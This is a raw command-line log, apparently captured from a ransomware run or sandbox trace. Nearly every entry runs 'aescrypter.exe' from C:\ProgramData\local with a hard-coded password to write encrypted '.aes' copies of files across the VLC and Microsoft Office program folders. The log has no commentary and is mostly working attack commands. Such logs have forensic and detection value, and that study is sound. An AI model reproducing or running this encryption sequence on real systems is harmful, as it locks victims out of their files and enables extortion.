"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Microsoft Office\Office14\Mso Example Setup File A.txt.aes" "C:\Program Files\Microsoft Office\Office14\Mso Example Setup File A.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\ResetReceive.png.aes" "C:\Program Files\ResetReceive.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\UpdateOut.xml.aes" "C:\Program Files\UpdateOut.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\AUTHORS.txt.aes" "C:\Program Files\VideoLAN\VLC\AUTHORS.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\COPYING.txt.aes" "C:\Program Files\VideoLAN\VLC\COPYING.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.xml.aes" "C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.xml.aes" "C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist_jstree.xml.aes" "C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist_jstree.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt.aes" "C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\status.xml.aes" "C:\Program Files\VideoLAN\VLC\lua\http\requests\status.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm.xml.aes" "C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm_cmd.xml.aes" "C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm_cmd.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\NEWS.txt.aes" "C:\Program Files\VideoLAN\VLC\NEWS.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\plugins\plugins.dat.aes" "C:\Program Files\VideoLAN\VLC\plugins\plugins.dat" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\README.txt.aes" "C:\Program Files\VideoLAN\VLC\README.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\skins\winamp2.xml.aes" "C:\Program Files\VideoLAN\VLC\skins\winamp2.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\THANKS.txt.aes" "C:\Program Files\VideoLAN\VLC\THANKS.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099145.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099145.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099148.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099148.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099150.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099150.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099152.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099152.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099154.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099154.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099155.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099155.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099156.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099156.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099157.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099157.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099160.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099160.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099161.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099161.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099162.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099162.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099165.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099165.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099166.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099166.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099167.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099167.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099168.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099168.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099185.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099185.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099186.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099186.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099187.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099187.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099188.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099188.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099189.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099189.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099190.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099190.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099191.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099191.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101856.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101856.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101857.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101857.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101858.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101858.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101859.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101859.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101860.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101860.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101861.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101861.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101862.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101862.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101863.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101863.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101864.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101864.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101865.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101865.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101866.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101866.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101867.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101867.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145168.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145168.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145212.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145212.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145272.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145272.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145361.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145361.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145373.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145373.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145669.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145669.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145810.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145810.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145879.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145879.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145904.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145904.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0146142.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0146142.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148309.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148309.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

